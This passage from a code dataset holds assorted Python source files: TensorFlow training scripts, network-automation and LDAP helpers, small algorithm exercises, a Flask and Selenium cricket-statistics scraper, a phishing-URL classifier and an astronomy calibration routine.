as data:\r\n return json.load(data)\r\n except Exception as e:\r\n print(e)\r\n\r\ndef write_json(data, file):\r\n try:\r\n with open(file, 'w') as file:\r\n json.dump(data, file, indent=2)\r\n except Exception as e:\r\n print(e)\r\n\r\ndef load_extension(bot, extension):\r\n try:\r\n bot.load_extension(extension)\r\n except Exception as e:\r\n print(f'Failed to load extension {extension}: {e}')\r\n\r\ndef is_command(commands, compare_text):\r\n for c in commands:\r\n if c.name == compare_text:\r\n return True\r\n return False","sub_path":"utils/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"423934125","text":"import os, sys\nsys.path.append(os.pardir)\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom sklearn.utils import shuffle\nimport shutil\nfrom scipy.io import loadmat\nfrom load_foot import Load_data, make_data\nfrom module.utility.history import History, Real_time_plot, EarlyStopping\nfrom module.basics.my_layers import bidirectional_LSTM, time_stacked_conv1d, accuracy\n\n\n'''\nモデルハイパーパラメータ\n'''\nseq_len = 128\nfreq = 64\nlr = 1e-4\nepochs = 1000\nbatch_size = 512\nk_prob = 0.6\nnum_sample = 100\n\n# early_stopping\nstop = False\n'''\nデータの生成\n'''\nos.chdir('data')\n\ntrain, train_label, test, test_label \\\n = make_data(train_mat = \"train_foot2.mat\",\n test_mat = \"test_foot2.mat\",\n train_label_mat = \"label_foot.mat\",\n test_label_mat = \"label_foot.mat\",\n seq_len=seq_len)\n\nplot_x = np.r_[train, test]\nplot_t = np.r_[train_label, test_label]\n\nN_train = len(train)\nn_batches = N_train // batch_size\nvector_dim = train.shape[2]\n\ntrain = train.reshape(-1, seq_len, vector_dim, 1)\ntest = test.reshape(-1, seq_len, vector_dim, 1)\n\n'''\n計算グラフ構築\n'''\nwith tf.variable_scope(\"Input\"):\n x = tf.placeholder(dtype=tf.float32, shape=[None, train.shape[1:]])\nwith tf.variable_scope(\"Target\"):\n t = tf.placeholder(dtype=tf.float32, shape=[None, 2])\nwith tf.variable_scope(\"dropout\"):\n keep_prob = tf.placeholder(dtype=tf.float32)\nwith tf.variable_scope(\"batch_normalization\"):\n b_n_on = tf.placeholder(dtype=tf.bool)\n\nh = x\n\nwith tf.variable_scope(\"conv-FIR\"):\n h = tf.layers.conv2d(h, filters=16, kernel_size=(6, 1), padding='same',\n activation=tf.nn.relu, use_bias=False)\n h = tf.nn.dropout(h, keep_prob=keep_prob)\n\n h = tf.layers.batch_normalization(h, training=b_n_on, axis=3)\n h = tf.layers.conv2d(h, filters=32, kernel_size=(6, 1), padding='same',\n activation=tf.nn.relu, use_bias=False)\n h = tf.layers.max_pooling2d(h, pool_size=(2, 1), strides=(2, 1))\n h = tf.nn.dropout(h, keep_prob=keep_prob)\n\n h = tf.layers.batch_normalization(h, training=b_n_on, axis=3)\n h = tf.layers.conv2d(h, filters=freq, kernel_size=(4, 1), padding='same',\n activation=tf.nn.relu, use_bias=False)\n h = tf.layers.max_pooling2d(h, pool_size=(2, 1), strides=(2, 1))\n h = tf.nn.dropout(h, keep_prob=keep_prob)\n\n\nwith tf.variable_scope(\"spatial_filter\"):\n h = tf.layers.batch_normalization(h, training=b_n_on, axis=2)\n h = tf.layers.conv2d(h, filters=freq, kernel_size=(1, 5), padding='same',\n activation=tf.nn.relu, use_bias=False)\n h = tf.layers.average_pooling2d(h, pool_size=(1, 5), strides=(1, 5))\n\n# with tf.variable_scope(\"RNN\"):\n# h = tf.unstack(h, None, 1)\n# cell = tf.contrib.rnn.LayerNormBasicLSTMCell(50, dropout_keep_prob=keep_prob)\n# att_cell = tf.contrib.rnn.AttentionCellWrapper(cell, attn_length=4)\n# h, _ = tf.contrib.rnn.static_rnn(att_cell, h, dtype=tf.float32)\n# h = h[-1]\n\nwith tf.variable_scope(\"dense\"):\n h = tf.contrib.layers.flatten(h)\n# h = tf.layers.batch_normalization(h, training=b_n_on)\n h = tf.layers.dense(inputs=h, units=256, activation=tf.nn.relu)\n# h = tf.layers.batch_normalization(h, training=b_n_on)\n h = tf.layers.dense(inputs=h, units=2, activation=tf.nn.relu)\n y = tf.nn.softmax(h)\n\nwith tf.variable_scope(\"loss\"):\n loss = tf.reduce_mean(-tf.reduce_sum(\n t * tf.log(tf.clip_by_value(y, 1e-10, 1.0)),\n reduction_indices=[1]))\n tf.summary.scalar(\"loss\", loss)\n\nwith tf.variable_scope(\"train_step\"):\n optimizer = tf.train.AdamOptimizer()\n train_step = optimizer.minimize(loss)\n\n'''\n学習\n'''\n\nprint(\"-------Session initialize--------\")\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nwriter = tf.summary.FileWriter(\"./logs/nn_logs\", sess.graph)\nmerged = tf.summary.merge_all()\nsess.run(init)\ntr_feed = {x: train, t: train_label, keep_prob: 1.0, b_n_on: False}\n\nprint(\"-------start training-------\")\nfor epoch in range(epochs):\n X_, Y_ = shuffle(train, train_label)\n\n for i in range(n_batches):\n start = i * batch_size\n end = start + batch_size\n\n sess.run(train_step, feed_dict={\n x: X_[start:end],\n t: Y_[start:end],\n keep_prob: k_prob,\n b_n_on: True\n })\n\n training_loss = sess.run(loss, feed_dict={\n x: train,\n t: train_label,\n keep_prob: 1.0,\n b_n_on: False\n })\n\n summary = sess.run(merged, feed_dict=tr_feed)\n writer.add_summary(summary, epoch)\n\n print(\"epoch:{}\\n training_loss:{}\".format(\n epoch, training_loss))\n\nprint(\"-------finish training-------\")\n\nhist = np.zeros(train_label.shape)\nfor i in range(num_sample):\n probability = sess.run(y, feed_dict={\n x: train,\n keep_prob: k_prob,\n b_n_on: False\n })\n inf = np.eye(2)[np.argmax(probability, 1)]\n hist += inf\nhist /= num_sample\ncorrect_prediction = np.equal(np.argmax(hist, 1), np.argmax(train_label, 1))\naccuracy = np.mean(correct_prediction.astype(np.float32))\n\nprint(\"train_accuracy:{}\".format(accuracy))\n\nplt.plot(np.argmin(hist, 1))\nplt.plot(np.argmin(train_label, 1))\nplt.show()\n","sub_path":"end2end/end2end.py","file_name":"end2end.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"90680874","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2019/10/24 13:55\n# @Author : RoryXiang (pingping19901121@gmail.com)\n# @Link : \"\"\n# @Version : 1.0\n\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.preprocessing import LabelBinarizer\n# LabelBinarizer 将非二值化特征二值化: [\"yes\", \"no\"] -> [1, 0]\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_digits\n\n\ndigits = load_digits()\nx_data = digits.data\ny_data = digits.target\ny_data = LabelBinarizer().fit_transform(y_data)\n\nx_train, x_test, y_train, y_test = train_test_split(\n x_data, y_data, test_size=0.3)\n\n\ndef add_layer(input, input_size, output_size, layer_name,\n activation_function=None):\n weights = tf.Variable(tf.random.normal([input_size, output_size]),\n dtype=np.float32)\n biases = tf.Variable(tf.zeros([1, output_size]) + 0.1)\n wx_plus_bias = tf.add(tf.matmul(input, weights), biases)\n wx_plus_bias = tf.nn.dropout(wx_plus_bias, keep_prob=0.1)\n if activation_function:\n output = activation_function(wx_plus_bias)\n else:\n output = wx_plus_bias\n return output\n\n\nxs = tf.placeholder(tf.float32, [None, 64])\nys = tf.placeholder(tf.float32, [None, 10])\nkeep_prob = tf.placeholder(tf.float32)\n\nl1 = add_layer(xs, 64, 50, \"l1\", activation_function=tf.nn.tanh) # l1\nprediction = add_layer(l1, 50, 10, \"l2\", activation_function=tf.nn.softmax)\n# l2\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(ys * tf.log(prediction),\n reduction_indices=[1]),\n )\n# 因为cross_entropy 是一个标量 所以定义tf.summary.scalar\n\ntf.summary.scalar(\"loss\", cross_entropy)\ntrain_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n # 合并所有的summary\n merged = tf.summary.merge_all()\n # 得到summary 的FileWriter\n train_writer = tf.summary.FileWriter(\"logs/train/\", sess.graph)\n test_writer = tf.summary.FileWriter(\"logs/test/\", sess.graph)\n\n sess.run(init)\n for i in range(1000):\n sess.run(train_step, feed_dict={xs: x_train,\n ys: y_train,\n keep_prob: 0.5})\n if i % 50 == 0:\n train_loss = sess.run(merged, feed_dict={xs: x_train,\n ys: y_train,\n keep_prob: 0.5})\n test_loss = sess.run(merged, feed_dict={xs: x_test,\n ys: y_test,\n keep_prob: 0.5})\n # train_writer.add_summary(train_loss, i)\n # mm = tf.compat.as_str(train_loss)\n print(\"train los: \", train_loss, \" test los: \", test_loss)","sub_path":"basic/dropout.py","file_name":"dropout.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"98923361","text":"#!/usr/bin/env python\n\nfrom nornir import InitNornir\nfrom nornir.plugins.tasks.networking import napalm_get\nfrom nornir.core.filter import F\nfrom pprint import pprint\n\ndef main():\n nr = InitNornir(config_file=\"config.yaml\")\n nxos = nr.filter(F(platform=\"nxos\"))\n results = nxos.run(\n task = napalm_get,\n getters = \"config\",\n getters_options = {\"config\": {\"retrieve\": \"running\"}}\n )\n for host, multi in results.items():\n print(\"=\" * 80)\n print(f\"Device {host}\")\n pprint(multi[0].result)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"wk3/ex6/ex6b.py","file_name":"ex6b.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"522952715","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/5/24 4:08 PM\n# @Author: lixiaomeng_someday\n# @Email : 131xxxx119@163.com\n# @File : TP_02_remove_duplicates.py\n\n\n\"\"\"\nstory:\n Given an array of sorted numbers, remove all duplicates from it.\n You should not use any extra space;\n after removing the duplicates in-place return the new length of the array.\n\nanalysis:\n 1、有序数组\n 2、子集\n\ninstance:\n Input: [2, 3, 3, 3, 6, 9, 9]\n Output: 4\n Explanation: The first four elements after removing the duplicates will be [2, 3, 6, 9].\n\n\"\"\"\n\n# method1: 利用集合去重\n\n\n# def remove_duplicates(array: list)->set:\n# un_duplicates_array = set(array)\n# return un_duplicates_array\n#\n#\n# def main():\n# arr_1 = [2, 3, 3, 3, 6, 9, 9]\n# print(remove_duplicates(arr_1))\n#\n#\n# if __name__ == \"__main__\":\n# main()\n\n\n# method2: 双指针法\n# 一个指针负责遍历,另一个指针负责记录动了多少次,这个是什么概念呢。就是只有遇到重复的element才会动,\n\ndef remove_duplicates(array:list):\n pointer_unduplicates: int = 0\n pointer_iterable: int = 1\n unduplicates_element_length: int = 1\n while pointer_iterable <= len(array) - 1:\n if array[pointer_iterable] - array[pointer_unduplicates] != 0:\n unduplicates_element_length += 1\n pointer_unduplicates = pointer_iterable\n\n pointer_iterable += 1\n return pointer_unduplicates, unduplicates_element_length\n\n\ndef main():\n arr_1 = [2, 3, 3, 3, 6, 9, 9]\n print(remove_duplicates(arr_1))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"xm02_array_two_pointers/TP_02_remove_duplicates.py","file_name":"TP_02_remove_duplicates.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"268466069","text":"from math import sqrt\nimport Stumpff\n\nmu = 398600\n\ndef compute_chi(r0, vr0, a, delta_t):\n alpha = 1 / a\n chi = sqrt(mu) * abs(alpha) * delta_t\n z = alpha * (chi) ** 2\n\n ratio = 1\n tolerance = 10**(-6)\n\n def compute_fchi(r0, vr0, delta_t):\n A = (r0 * vr0 / sqrt(mu)) * (chi) ** 2 * Stumpff.stumpC(z)\n B = (1 - alpha * r0) * (chi) ** 3 * Stumpff.stumpS(z)\n C = r0 * chi - (sqrt(mu) * delta_t)\n return A + B + C\n\n def compute_fchi_derivative(r0, vr0):\n D = (r0 * vr0 / sqrt(mu)) * (chi) * (1 - (alpha * (chi) ** 2 * Stumpff.stumpS(z)))\n E = (1 - alpha * r0) * (chi) ** 2 * Stumpff.stumpC(z) + r0\n return D + E\n\n while abs(ratio) > tolerance:\n ratio = compute_fchi(r0, vr0, delta_t) / compute_fchi_derivative(r0, vr0)\n chi = chi - ratio\n\n return chi\n\ndef main():\n chi = compute_chi(r0=14000, vr0=-2.6679, a=14000, delta_t=3600)\n #chi = compute_chi(r0=10000, vr0=3.0752, a=-19655, delta_t=3600)\n print(chi)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"UniversalAnomaly.py","file_name":"UniversalAnomaly.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271422412","text":"#!/usr/bin/env python\n\n\"\"\"\n\nWrite the shortest possible code which converts tabs to spaces in the input. Tab size should be supplied as a parameter or be hardcoded in the code in a single place.\n\nSpaces on output should point to the right column, e.g. (\\t represents a tab character):\n\na\\tb\naa\\tb\naaa\\tb\naaaa\\tb\nshould become (for tab size 4):\n\na b\naa b\naaa b\naaaa b\nOf course there can be more than one tab in a line.\n\nLine separator and tab character should match the system defaults (e.g. ASCII 10 and 9 on Unix).\n\n\"\"\"\n\ndef convert(s):\n r = \"\"\n i = 0\n for c in s:\n if c != '\\t':\n r += c\n else:\n r += \" \" * (4 - (i % 4))\n i += 1\n return r\n\ndef main():\n assert(convert(\"a\\tb\") == \"a b\")\n assert(convert(\"aa\\tb\") == \"aa b\")\n assert(convert(\"aaa\\tb\") == \"aaa b\")\n assert(convert(\"aaaa\\tb\") == \"aaaa b\")\n\nmain()\n","sub_path":"codegolf/convert-tabs-to-spaces.py","file_name":"convert-tabs-to-spaces.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"58903127","text":"from ldap3.utils.conv import escape_filter_chars\nfrom parse import compile\n\"\"\"\nvery poor mans ldapfilter handling\nonly stacking up & filters is supported by now\n\"\"\"\n\n\nclass LdapFilterParam(object):\n def __init__(self, attrname, attrvalue):\n self.attrname = attrname\n self.attrvalue = attrvalue\n\n def __repr__(self):\n val = escape_filter_chars(self.attrvalue)\n fstr = \"({}={})\".format(self.attrname, val)\n return fstr\n\n\nclass LdapFilter(object):\n p = compile(\"{}={}\")\n\n def __init__(self, parameter=None):\n self.parameters = list()\n if parameter:\n (attrname, attrvalue) = self.p.parse(parameter)\n filter_param = LdapFilterParam(attrname, attrvalue)\n self.parameters.append(filter_param)\n return\n\n def add(self, attrname, attrvalue):\n param = LdapFilterParam(attrname, attrvalue)\n self.parameters.append(param)\n return\n\n def filter_string(self):\n filter_string = \"(objectClass=*)\"\n if len(self.parameters) == 1:\n filter_string = str(self.parameters[0])\n if len(self.parameters) > 1:\n param_strings = []\n for param in self.parameters:\n param_strings.append(str(param))\n filter_string = \"(&\" + \"\".join(param_strings) + \")\"\n return filter_string\n\n def __repr__(self):\n r = self.filter_string()\n return r\n","sub_path":"classes/ldapfilter.py","file_name":"ldapfilter.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"247511234","text":"#!/usr/bin/env python3\n\nimport argparse\nimport binascii\nimport json\n\nfrom uplink import *\n\n\n# Command-line arguments\nparser = argparse.ArgumentParser(prog='create-test-asset',\n description='''\nThis script creates some accounts with a 'Name' metadata\nfield, and outputs the account keys and addresses as JSON.\n''')\n\nargs = parser.parse_args()\n\n\n# Connect to Uplink\nrpc = UplinkJsonRpc(host=\"localhost\", port=8545, tls=False)\n\n# Create test accounts\ndef create_account(rpc, name):\n pubkey, skey = ecdsa_new()\n\n metadata = dict(Name = name)\n\n txhash, address = rpc.uplink_create_account(\n private_key=skey,\n public_key=pubkey,\n from_address=None,\n metadata=metadata,\n timezone=\"CET\"\n )\n\n return {\n 'name': name,\n 'address': address,\n 'public_key': binascii.b2a_hex(pubkey.to_string()).decode(),\n 'private_key': binascii.b2a_hex(skey.to_string()).decode()\n }\n\naccounts = []\nfor name in [\"Alice\", \"Bob\", \"Charlie\", \"David\"]:\n accounts.append(create_account(rpc, name))\nprint(json.dumps(accounts, sort_keys=True, indent=4))\n","sub_path":"scripts/create-test-accounts.py","file_name":"create-test-accounts.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"479892666","text":"from flask import Flask,url_for,render_template,jsonify,request,send_from_directory,redirect;\nimport logging as lg;\nimport loggin as domain;\nimport os;\nimport jinja2;\nfrom flask_socketio import SocketIO;\nfrom flask_sock import Sock\nfrom mongodbsetup import createMongoConnectionObject;\nfrom bs4 import BeautifulSoup as bs;\nfrom selenium import webdriver\nfrom selenium.webdriver.common import keys\nimport requests as rs\nfrom selenium.webdriver.chrome.options import Options\nimport pandas as pd;\nimport time as te;\nimport plotly.offline as po;\nimport plotly.express as px;\nimport plotly.graph_objects as go;\n# import scrapy as scrap;\ncrome_driver_path = 'E:/inuron/videos/scraping and seaborn/chromedriver.exe';\n\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\n # chrome_options.add_argument(\"--window-size=%s\" % WINDOW_SIZE)\n # chrome_options.binary_location = CHROME_PATH\n\n\n\n\n# driver.get('https://www.espncricinfo.com/')\n# zz=driver.find_element_by_xpath(\"//a[@data-hover='Teams']\")\n\n# zz.click();\n# az=driver.find_element_by_xpath(\"//*[@id='navbarSupportedContent']/ul[2]/div/li\")\n\n# az.click()\n# pp=driver.find_element_by_xpath(\"//*[@id='navbarSupportedContent']/ul[2]/div/div/div/form/input\")\n# pp.send_keys('Sachin');\n# pp.send_keys(keys.ENTER);\n# zz=driver.find_element_by_xpath(\"//*[@id='navbarSupportedContent']/ul[2]/div/div/div/form/button\")\n\n# zz.click();\nprint('gggggggggggggggggggggggggggggggggggggggggggggggggggg')\n# print(driver.page_source)\n# bs=BeautifulSoup(driver.page_source,'html.parser')\n# ele=bs.xpath(\"//*[@id='navbarSupportedContent']/ul[2]/div/div/div/form/input\")\n# print(bs)\n# driver.close()\n# zz=rs.get('https://www.espncricinfo.com/')\n# for i in :\n # print(i)\n# kk=[i for i in zz]\n# print(kk) \nloger=domain.loggin()\ndoimanFile=loger.writingInfile();\ndomainConsole=loger.writeInConsolo();\n\ndb_connection=createMongoConnectionObject();\nmain_db=db_connection.sendMongoConnection()\ndomainConsole.info('mongo connection seccused');\nprint(main_db)\n\n######################\nvsTeam='#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div:nth-child(3) > div';\ninHostCountry = '#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div:nth-child(4) > div'\ninContinent = '#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div:nth-child(5) > div'\nhomeVsAway = '#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div:nth-child(6) > div'\nbyEar= '#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div:nth-child(7) > div'\n \n# try:\n# zk=main_db['sub']\n# collections1=zk['super']\n# collections1.insert_one({'name':'happy'})\n# print(main_db.list_database_names())\n# print('inserted')\n# except Exception as e:\n# domainConsole.error('Error inserting');\n# doimanFile.error(f'Error inserting2')\n# template_dir = os.path.join(template_dir,'\\practice\\flaskProject\\template')\n# domain.logger.error(template_dir)\napp = Flask(__name__, template_folder ='views', static_folder='stastic');\n\n# app.config['SECRET_KEY'] = 'secret!'\n# socketio = SocketIO(app)\n# sock = Sock(app)\n\n# my_loader = jinja2.ChoiceLoader([\n# app.jinja_loader,\n# jinja2.FileSystemLoader(['/flaskProject/views']),\n# ])\n\n\n# app.jinja_loader = my_loader\n@app.route('/uploadimg',methods=[\"GET\"]) \ndef homePage():\n # domain.view_log.info('This is a warning message') \n # domain.logger.error('This is an error message') \n # domain.logger.critical('Dheeraj')\n \n domainConsole.info('This is a warning message') \n domainConsole.error('This is an error message') \n doimanFile.critical('Dheeraj File')\n \n # logg.error('hii')\n # ap0=os.path.join(template_dir,'homePage','home.html',template_folder='folder1')\n # return render_template('homePage\\home.html',template_folder=template_dir);\n replies = {'Jack':'Cool post',\n\t\t\t 'Jane':'+1',\n\t\t\t 'Erika':'Most definitely',\n\t\t\t 'Bob':'wow',\n\t\t\t 'Carl':'amazing!'};\n \n # return send_from_directory('views','homePage/home.html') \n return render_template('homePage/home2.html',replies=replies)\n # views\\homePage\\home.html\n \n@app.route('/resiveScrapingUrl',methods=['POST'])\ndef geturl():\n print(request.form['scrapingUrl']);\n driver = webdriver.Chrome(executable_path=crome_driver_path)\n driver.get(request.form['scrapingUrl'])\n \n # selectedElement=driver.find_element_by_css_selector('#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div:nth-child(3) > div')\n selectorDropdown=driver.find_element_by_css_selector('#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div.player_stats-header.d-flex.justify-content-between.align-items-center > div > div > div:nth-child(1) > button')\n selectorDropdown.click()\n if (request.form['matchFormat'] == 'Test') :\n try :\n \n \n selectfiefd=driver.find_element_by_css_selector('#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div.player_stats-header.d-flex.justify-content-between.align-items-center > div > div > div:nth-child(1) > div > div > ul > li.ci-dd__selected-option')\n selectfiefd.click()\n except Exception as e:\n domainConsole.error(e) \n doimanFile.critical(e)\n \n if (request.form['matchFormat'] == 'odi') :\n try :\n \n selectfiefd=driver.find_element_by_css_selector('#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div.player_stats-header.d-flex.justify-content-between.align-items-center > div > div > div:nth-child(1) > div > div > ul > li:nth-child(2)')\n selectfiefd.click() \n except Exception as e :\n domainConsole.error(e) \n doimanFile.critical(e)\n \n if (request.form['matchFormat'] == 'Test') :\n try:\n \n \n selectfiefd=driver.find_element_by_css_selector('#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div.player_stats-header.d-flex.justify-content-between.align-items-center > div > div > div:nth-child(1) > div > div > ul > li:nth-child(3)')\n selectfiefd.click()\n except Exception as e :\n domainConsole.error(e) \n doimanFile.critical(e)\n vs='' \n if (request.form['vs'] == 'vs Team') :\n vs=vsTeam;\n if (request.form['vs'] == 'In Host Country') :\n vs=inHostCountry; \n if (request.form['vs'] == 'in Continent') :\n vs=inContinent; \n if (request.form['vs'] == 'Home vs Away') :\n vs=homeVsAway; \n if (request.form['vs'] == 'By Year') :\n vs=byEar; \n \n te.sleep(5)\n selectedElement=driver.find_element_by_css_selector(vs)\n \n table=selectedElement.get_attribute('innerHTML');\n soupobj=bs(table,'html.parser')\n \n allLinksinTable = soupobj.find_all('a')\n \n \n dataframe=pd.read_html(table)\n fig0=[];\n \n for i in list(dataframe[0].index):\n fig0.append(go.Scatter(x=[dataframe[0]['Span'][i]],y=[dataframe[0]['Runs'][i]],mode='markers',name=str(dataframe[0]['Title'][i]),hovertemplate=f\"HS:{[dataframe[0]['HS'][i]]}
    AVG:{[dataframe[0]['Avg'][i]]}\"))\n \n fig0.append(go.Scatter(x=dataframe[0]['Span'],y=dataframe[0]['Runs'],mode=\"lines\"))\n fig=go.Figure(data=fig0)\n po.plot(fig,filename=\"views/homePage/first_figure.html\",auto_open=False)\n te.sleep(5)\n driver.close()\n # return redirect(url_for('http://localhost:8000/graphview'))\n return {'uri':'/graphview'}\n\n@app.route('/graphview')\ndef showGraph():\n return render_template('homePage/first_figure.html')\n \n@app.route('/',methods=['GET'])\ndef vedioPage():\n try :\n return render_template('homePage/home.html') \n except Exception :\n \n domainConsole.error('video page rendring error') \n doimanFile.critical('video page rendring error')\n \n# @socketio.on('connecteduser')\n# def showConnectedMsg(data):\n# print(data) \n\n # while True:\n # data = ws.receive()\n # ws.send(data)\n \nif __name__ == '__main__':\n app.run(host=\"localhost\", port=8000, debug=True); \n # socketio.run(app,host=\"localhost\", port=3030, debug=True)\n # websockets.serve('hello', \"localhost\", 8765); \n ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"252668050","text":"import random\n\n''' Python provides a really easy way of\n of writing the coin toss program. Over\n here we will be using the random function.\n Using this, we will provide the values 0\n and 1 to denote heads and tails.\n '''\n\ndef coin_toss():\n\n heads = 0\n tails = 0\n\n while True:\n prompt = \"Enter to flip coin. Press ctrl + z to exit\"\n input(prompt)\n\n # Use the random function to flip the coin\n # Heads is denoted by 0\n # Tails is denoted by 1\n toss = random.randint(0, 1)\n\n if toss == 0:\n heads += 1\n \n else:\n tails += 1\n\n print(\"Heads: \", heads)\n print(\"Tails: \", tails)\n\ncoin_toss()\n \n","sub_path":"coinflip.py","file_name":"coinflip.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"270118847","text":"from sklearn.tree import DecisionTreeClassifier\r\n\r\nimport pandas as pd\r\nimport Features\r\n\r\ndata = pd.read_csv('Dataset.csv',delimiter=',',header=0)\r\nX = data.iloc[:,:-1].values\r\nY = data.iloc[:,-1].values\r\nclf = DecisionTreeClassifier()\r\nclf = clf.fit(X,Y)\r\n#input url\r\nurl = input(\"Enter the URL:\")\r\n\r\n#checking and predicting\r\ncheckprediction = Features.main(url)\r\nprediction = clf.predict(checkprediction)\r\nif (prediction == [1]):\r\n print(\"Phishing\")\r\nelse:\r\n print(\"Legitimate\")\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"450906933","text":"# routines for comparing gravities with photometric` sample\n\nfrom apogee.utils import apload\nfrom apogee.utils import apselect\nfrom astropy.io import fits\nfrom astropy.io import ascii\nfrom tools import match\nfrom tools import plots\nfrom tools import fit\nfrom apogee.utils import bitmask\nfrom apogee.aspcap import err\nimport pdb\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport matplotlib\n\ndef bindata(xdata,ydata,bins,median=True) :\n \"\"\"\n Given xdata, ydata, and bins in x, returns mean of ydata in each of the bins\n \"\"\"\n mean=bins*0.\n for i in range(len(bins)-1) :\n j=np.where((xdata>bins[i]) & (xdataglatmin and SFD_EBVglatmin)&(allstar['SFD_EBV']glatmin)&(allstar['SFD_EBV']>-0.01)&(allstar['SFD_EBV'] 3.8)[0]\n ghb[dw]=ghb_dwarf[dw]\n dtdjk[dw]=dtdjk_dwarf[dw]\n gd=np.where(abs(allstar['FPARAM'][:,0]-ghb) < 500)[0]\n ghb=ghb[gd]\n dtdjk=dtdjk[gd]\n allstar=allstar[gd]\n print('Teff calibration, number of stars: ', len(allstar))\n\n if calib : \n param='PARAM'\n teff=allstar[param][:,0]\n logg=allstar[param][:,1]\n mh=allstar[param][:,3]\n am=allstar[param][:,6]\n elif grid is None :\n param='FPARAM'\n teff=allstar[param][:,0]\n logg=allstar[param][:,1]\n mh=allstar[param][:,3]\n am=allstar[param][:,6]\n else :\n param='FPARAM_CLASS'\n teff=allstar[param][:,grid,0]\n logg=allstar[param][:,grid,1]\n mh=allstar[param][:,grid,3]\n am=allstar[param][:,grid,6]\n out=out+'_grid{:1d}'.format(grid)\n\n # plot Teff difference against metallicity, color-code by temperature\n fig,ax=plots.multi(1,1,hspace=0.001,wspace=0.001,figsize=(12,6))\n xr=[-3.0,1.0]\n zr=trange\n if dr13: zr=[3500,5500]\n binsize=0.25\n bins=np.arange(-2.5,0.75,binsize)\n # diff color-coded by gravity as f([M/H])\n\n if alpha :\n plots.plotc(ax,mh,teff-ghb,am,zr=[-0.1,0.4],xr=xr,yr=yr,xt='[M/H]',yt='ASPCAP-photometric Teff',colorbar=True,zt=r'[$\\alpha$/M]',rasterized=True,cmap=cmap)\n else :\n plots.plotc(ax,mh,teff-ghb,teff,xr=xr,yr=yr,xt='[M/H]',yt='ASPCAP-photometric Teff',colorbar=True,zt='$T_{eff}$',rasterized=True,zr=trange,cmap=cmap)\n mean=bindata(mh,teff-ghb,bins,median=False)\n if not dr13: plots.plotp(ax,bins+binsize/2.,mean,marker='o',size=40)\n mean=bindata(mh,teff-ghb,bins,median=True)\n if not dr13: plots.plotp(ax,bins+binsize/2.,mean,marker='o',size=40,color='b')\n ax.text(0.1,0.9,'E(B-V)<{:6.2f}'.format(ebvmax),transform=ax.transAxes)\n gd=np.where(np.isfinite(mean))[0]\n tefit = fit.fit1d(bins[gd]+binsize/2.,mean[gd],degree=2,reject=0)\n # 1D quadratic fit as a function of metallicity\n allfit = fit.fit1d(mh,teff-ghb,ydata=teff,degree=2,reject=0)\n fig2,ax2=plots.multi(1,1)\n tefit2 = 